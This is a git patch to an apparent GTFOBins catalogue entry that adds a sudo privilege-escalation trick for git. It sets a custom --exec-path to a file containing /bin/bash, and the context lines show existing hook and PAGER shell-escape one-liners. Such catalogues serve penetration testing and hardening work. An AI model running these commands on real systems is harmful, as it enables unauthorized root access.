From ef2ebf9d307f1d25e710f8b6e9c05727baabdd75 Mon Sep 17 00:00:00 2001
From: PaulSaladin <paul.saladin@hotmail.fr>
Date: Fri, 2 Oct 2020 15:53:06 +0200
Subject: [PATCH] Add new sudo git function #Yaml_fix

---
 _gtfobins/git.md | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/_gtfobins/git.md b/_gtfobins/git.md
index 89a64bb..737b780 100644
--- a/_gtfobins/git.md
+++ b/_gtfobins/git.md
@@ -35,6 +35,12 @@ functions:
         echo 'exec /bin/sh 0<&2 1>&2' >"$TF/.git/hooks/pre-commit.sample"
         mv "$TF/.git/hooks/pre-commit.sample" "$TF/.git/hooks/pre-commit"
         sudo git -C "$TF" commit --allow-empty -m x
+    - description: If file creation is allowed, it can be used to change Git path
+      code: |
+        mkdir /tmp/git
+        echo '/bin/bash' > /tmp/git/git-escalation
+        chmod +x /tmp/git/git-escalation
+        sudo git --exec-path=/tmp/git escalation
   limited-suid:
     - code: PAGER='sh -c "exec sh 0<&1"' ./git -p help
 ---